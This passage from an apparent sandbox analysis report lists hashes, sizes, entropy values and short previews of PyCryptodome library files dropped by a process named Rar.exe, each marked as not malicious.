                                                                                                                                                                                                                                  Entropy (8bit):5.021175970297132
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LtZ3XEDf:Jy+1o3xf1ov2GovRLP3s
                                                                                                                                                                                                                                  MD5:B10C8861416461026424D8341D6B711B
                                                                                                                                                                                                                                  SHA1:9207CD03C8A4F03ADE3FB52D7DD1828E8B734090
                                                                                                                                                                                                                                  SHA-256:2B2FB1983B8866D1CA635CDA145BF4639196A83A0F9B8AA7A6D0F0D39913F8F0
                                                                                                                                                                                                                                  SHA-512:F99F6E29E7980B548D07A760C116964872909158395D158C9199F5E458952AC37EA2D1645E186ED5EB17B570061F60D2A7A903218C9FADE89D61A5FF4562134C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: ...........def new(rsa_key: RsaKey, mgfunc: Optional[MaskFunction]=None, saltLen: Optional[int]=None, randfunc: Optional[RndFunction]=None) -> PSS_SigScheme: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2042
                                                                                                                                                                                                                                  Entropy (8bit):5.32432696462352
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIH20+8bETupt3Tk2dRGM:MwDqrYJALrYJHdt3EHGuIjRjtPGM
                                                                                                                                                                                                                                  MD5:7D8BF8D0C4889A5BF6BB4EB95AA44466
                                                                                                                                                                                                                                  SHA1:06633D6A4637773198A481EAB9ED156591DB7932
                                                                                                                                                                                                                                  SHA-256:0653BE50072749B16247CBB4905BB79FBD877FFC93F51C5B3E59EDC5FEB48E07
                                                                                                                                                                                                                                  SHA-512:68B95CBC4A39638FB7462DC391A145EC115BA045F301FEC54A475D134E5A3C93ED3223DD06C8895D2916294FB09A2A54B6D666307053F1AFC443AAF879267806
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):467
                                                                                                                                                                                                                                  Entropy (8bit):4.916093935652459
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLtw3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+Ltw3X2
                                                                                                                                                                                                                                  MD5:CA5E82193E428D853927F573B9D0AFFD
                                                                                                                                                                                                                                  SHA1:D1A94E957421405394C4EA31C15A384E3B758978
                                                                                                                                                                                                                                  SHA-256:FCA639E57C49A12AE306A309B29E2D2F49730F65AA23C5FF7DBC031A9EE8D378
                                                                                                                                                                                                                                  SHA-512:EEEDB242B966E71847B03C7CBBC519E77BBCB1DCCD2BE1CEE0BBF2A29B9833F22ACCAD774B7F782D4BF3D3F3EDC7B959117252D2C6C21ABFB1678166BE80AF84
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .........def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1731
                                                                                                                                                                                                                                  Entropy (8bit):5.278283491953278
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHQ+t1v:MwDqrYJALrYJHdt3EHGuIT
                                                                                                                                                                                                                                  MD5:60FAD4E2C2EF2BA9BC88934491AB89F8
                                                                                                                                                                                                                                  SHA1:45D630681807B431E6A26BF1438B4A477F07BE74
                                                                                                                                                                                                                                  SHA-256:2567D9DADE66C8CE9981C1B3856398708FFF5037E6ABBF4C0A9D60AFBD1E8678
                                                                                                                                                                                                                                  SHA-512:DDF73D98249043EB96E57121447EAEABB54E31DD35ACEC319FA7195B9DBC03D1B914E4014A023CB5ADC01F5DCB9C981ADF4F962EFAF011B723EC1F6C47CE5D10
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12758
                                                                                                                                                                                                                                  Entropy (8bit):4.953249726457768
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6qrskrs9t3q/IVQVluiDVluYQu1s1NuMMMt:Frskrs9VqMlB1L
                                                                                                                                                                                                                                  MD5:0A4AF23CD5DF55B2C6E57D27689FCD5C
                                                                                                                                                                                                                                  SHA1:EAC0752A6E323C8A7EEB4D740268364526422DB5
                                                                                                                                                                                                                                  SHA-256:2DC65C619AFC2F1F5D170FA8FC67998B78FEB6ECC9EA4A3375AFE3C10AB37348
                                                                                                                                                                                                                                  SHA-512:E540382C6CCBACA754AED2B9F9A0D90938A37A00ED27B3829AD69B6089EC267767BEEB10968FD30BA7CBA586E20EB2DA6FE5D5ABC69AFA77AFE935C5D2D3482B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):747
                                                                                                                                                                                                                                  Entropy (8bit):4.991320777959256
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1REYBlRE1BvxS+1dw1z4L556trLuh72tR5A8TTo448/u4Jw1AL1A19YRG98mfvIs:1REOC1++161z4Nfh7IGhI+1mAl9Zfjuk
                                                                                                                                                                                                                                  MD5:F75719D633E9543F8B2191818F5F949E
                                                                                                                                                                                                                                  SHA1:50C2F1E8A90E757A473DDD36FA897EBA33B52786
                                                                                                                                                                                                                                  SHA-256:AB1B0BBE6DF0B563E17CF22EB3DCE37DAC436C836F19A3498647B6A167BC2C45
                                                                                                                                                                                                                                  SHA-512:B5472537D636DB5D8EE6BADEA791816C4E6B052D899AB443D8BC5CB5E4721B1C1B79160F114FEC8A289578566084D3B5C8E7E0385066A331FC9864465BBD0541
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Optional..from typing_extensions import Protocol..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class XOF(Protocol):.. def read(self, len: int) -> bytes: .......def import_public_key(encoded: bytes) -> EccKey: .....def import_private_key(encoded: bytes) -> EccKey: .......class EdDSASigScheme(object):.... def __init__(self, key: EccKey, context: bytes) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_or_hash: Union[bytes, Hash, XOF]) -> bytes: ..... def verify(self, msg_or_hash: Union[bytes, Hash, XOF], signature: bytes) -> None: .......def new(key: EccKey, mode: str, context: Optional[bytes]=None) -> EdDSASigScheme: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9088
                                                                                                                                                                                                                                  Entropy (8bit):5.053423261865839
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/ISM97UQFA2CEkoA3KhNzYaomc:0rskrs9VqdM97UQFAM+go
                                                                                                                                                                                                                                  MD5:8DD798B530CC55801BC2744A469CD46F
                                                                                                                                                                                                                                  SHA1:70FBA1485270D0F63B5C676B2AFC0CCAF606A06F
                                                                                                                                                                                                                                  SHA-256:2E59C1BB1C7A738F51343213C94F49503CB91BAD07D906272FA44BCC1CEDD8FA
                                                                                                                                                                                                                                  SHA-512:82DBDDC02494535B90B4388ED6698CBC4F90A0589B32A5D693C8134BF682007896E47C0055C222FE89260AF21CE8E0D4F639CEE61F02677893BD82937C310173
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):581
                                                                                                                                                                                                                                  Entropy (8bit):5.067047688730709
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLRwlbQgA85A3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+LRwlbf
                                                                                                                                                                                                                                  MD5:DC28B90A844CBE3BCE2F14FBAD339B51
                                                                                                                                                                                                                                  SHA1:920E136B27895D970DE44FC61B00180D4DB686F2
                                                                                                                                                                                                                                  SHA-256:E2CE13431A88DD8206D23EF6C0E1935B61795A97166309CA8FBED78D68AF6FED
                                                                                                                                                                                                                                  SHA-512:BC0C4D5F5FD2DB593B00144EB4DDC1BEE12B71CA399CC08C25F00C11B0463404B64FD20F2A13FC91B83ED7DE03E132AA1E968D12373D96E74BFDA0C4CA68A105
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .......def _EMSA_PKCS1_V1_5_ENCODE(msg_hash: Hash, emLen: int, with_hash_parameters: Optional[bool]=True) -> bytes: .......def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13970
                                                                                                                                                                                                                                  Entropy (8bit):4.861341757640308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IFlYlgXJ0rcUfsOg58VFJbAVFtn3sxliqu8:0rskrs9Vq+GgXirHfsv8VEVP8/RL
                                                                                                                                                                                                                                  MD5:2A9F316CD479BB56AE101218E1B96816
                                                                                                                                                                                                                                  SHA1:3E63E6B6F8D771082C7DFF39B827BBB55BDA5CA9
                                                                                                                                                                                                                                  SHA-256:47736BFBB2762DEA089BE962E283E1E1155C51A2280C1839F5494B5BA9B72973
                                                                                                                                                                                                                                  SHA-512:C0F595025D3C77DB448177FFFAEC7FFA82FC021F08A351E00644CCA0F1006B1D68B4D6D567D242D56040CB7180D8B69DDD592C9ED85D653C34F8CCA026DCB84D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1071
                                                                                                                                                                                                                                  Entropy (8bit):5.102431129383602
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LAu8Bo633XfD7:Jy+1o3xf1ov2GovRLAVnPf
                                                                                                                                                                                                                                  MD5:505820D514B9F7B2244301F2DC317034
                                                                                                                                                                                                                                  SHA1:A90CFF03252A14134E286EB646ED62D9B82E076D
                                                                                                                                                                                                                                  SHA-256:0A62FC61A9C9A60FDADEFBCF20BCAD59140D16C09E4485A28820F9D14B156ACE
                                                                                                                                                                                                                                  SHA-512:B5A534C52FC07BC8E0A145F628857381F7A8F4570459A83D3DFD4BFB0A6BD526465C1291CB8F2714F5B8A02D12A3403FBEC6B666BE49608B87D3CA80E10D8EC8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .........MGF1 : MaskFunction..def _EMSA_PSS_ENCODE(mhash: Hash, emBits: int, randFunc: RndFunction, mgf:MaskFunction, sLen: int) -> str: .....def _EMSA_PSS_VERIFY(mhash: Hash, em: str, emBits: int, mgf: MaskFunction, sLen: int) -> None: .....def new(rsa_key: RsaKey, *
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3292
                                                                                                                                                                                                                                  Entropy (8bit):5.003098854081704
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MRwEIB0jcQHMsvI/S3oCFGAZUqjZibFduSmZpoRE3bpJ5U:MRwfFQHvo2Uq1cFYSYpCE3bpJ5U
                                                                                                                                                                                                                                  MD5:25E5852A52182CBF645AC075BDE04C8E
                                                                                                                                                                                                                                  SHA1:5431574C5E607B91EE33D90D2DBD52E6634622A5
                                                                                                                                                                                                                                  SHA-256:E0D9B91A882D3986EF288761C85527F658E552B9A48B02AD630896A10B155F9B
                                                                                                                                                                                                                                  SHA-512:8AE1F5A17386A33B2C6E4D9360C2CCFEA10549DCDDAA920919B12C8FF4975AAA536E759C5C98885E9863194381B3C9B1E40D935C2562C80786CC9EEAE238A4BD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: ascii -*-..#..# Util/Counter.py : Fast counter for use with CTR-mode ciphers..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):295
                                                                                                                                                                                                                                  Entropy (8bit):4.705947008789207
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:1REYBr0hxrMND0R2D9F6s/2F62LMJteOFr2gCUA2gA1MJFuJry:1REYBr0DI1RFF2FDLMJzZ2gCn2gA1gM4
                                                                                                                                                                                                                                  MD5:48844D3840F12D7CC253481AEB936730
                                                                                                                                                                                                                                  SHA1:2329321B884361FF52CD1E79D4ECD3ABD2C08309
                                                                                                                                                                                                                                  SHA-256:7A86661370C3B894AEB4EDAD8755466DE52226588608A530F63F3E3379585AD0
                                                                                                                                                                                                                                  SHA-512:06990D253057568DB8B16CAFF5599CD48FDE3100B5193213BD250BD1797D11F2A62C00D493AAC5CA60CD557514B3AC543454D9D50991B9EEAA735B3D6E3A7150
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4421
                                                                                                                                                                                                                                  Entropy (8bit):5.191112640865006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:e1tDqrYJALrYJHdt3EHGuI2gHdYUI1e+GJF37gR8C91/ErvyGAhQyAk:e1Vqrskrs9t3q/ILxF379aGyQyh
                                                                                                                                                                                                                                  MD5:FBF391FD249DDBB1C32502AC42999B5D
                                                                                                                                                                                                                                  SHA1:9559F22269BBE2A0F918705DED635B8CC666DD10
                                                                                                                                                                                                                                  SHA-256:A04416E7AA698FFFC0301EE284720426B69E9A3BCB2A0C7E954A054698C29405
                                                                                                                                                                                                                                  SHA-512:4241AEF302C010640C2FA86D92F2EE7EA34A865F759D14C02024F62A3452C593C0BCCABFE46043E879EB1CD73A290F85C0DD106A294684F628C100EA06382DF9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# Util/Padding.py : Functions to manage padding..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SH
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):243
                                                                                                                                                                                                                                  Entropy (8bit):4.823438083026704
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:1REYB0yqDLWJJni6Co6sRGcp5gUeQ/6sRGcp5/:1REYBkDyHZHRGe5VeQPRGe5/
                                                                                                                                                                                                                                  MD5:72AE5A92A5B5373240F3184324E84F6B
                                                                                                                                                                                                                                  SHA1:976AEA0ED87A3C086D068AE560FDB2FFCD591676
                                                                                                                                                                                                                                  SHA-256:ED464B7B39D2481D2C4DE1FF908308ADF7F035B21B3F7A242E469F1BD173DEF6
                                                                                                                                                                                                                                  SHA-512:27C15B7D76E180E1B65D566D8225C3661E78854515C9716A645C5F62E444B5A90AB61DDF92677B9C4A1276921711C281C814CAC60FA6D0BFC76A7716E4124613
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21578
                                                                                                                                                                                                                                  Entropy (8bit):4.591349548627808
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:aPe4cRum4V+EE2tKm/8MboR6U/6LcleM6s4riu6gvZGVSRq67:DAfHQgRGVe37
                                                                                                                                                                                                                                  MD5:73AEDFB55D3A90F08A29CC5D0AB7E623
                                                                                                                                                                                                                                  SHA1:D576725EC2571123AFE056369B58063BFB9D7724
                                                                                                                                                                                                                                  SHA-256:DFDB8CD578E00E485AD2070F24A3CFD7B0E75C972EBA73912B0BB59D8D67193B
                                                                                                                                                                                                                                  SHA-512:BB63BA3D20FC92A942F16C35E0128AEB2810310F75778FD6218D037D40AFFFCF3E19FFADE08882C0EC781548EACB5588A5B5A964E96FC5753CF44A9053EAADFD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# rfc1751.py : Converts between 128-bit strings and a human-readable..# sequence of words, as defined in RFC1751: "A Convention for..# Human-Readable 128-bit Keys", by Daniel L. McDonald...#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DA
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):166
                                                                                                                                                                                                                                  Entropy (8bit):4.7074966574817525
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
                                                                                                                                                                                                                                  MD5:0DE296D8A8547E04D6926C50733B2BE8
                                                                                                                                                                                                                                  SHA1:00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
                                                                                                                                                                                                                                  SHA-256:76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
                                                                                                                                                                                                                                  SHA-512:1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1968
                                                                                                                                                                                                                                  Entropy (8bit):4.96168817055765
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:KIB0jcQHMsvI/S3oCFxSawf+bBVZ4YuOr2:dFQHvoEQ+tvY
                                                                                                                                                                                                                                  MD5:CCD084ED08A6E3D89DC9B9ECD62D524D
                                                                                                                                                                                                                                  SHA1:439DDFB5344BA4510F46A29913E7764824094696
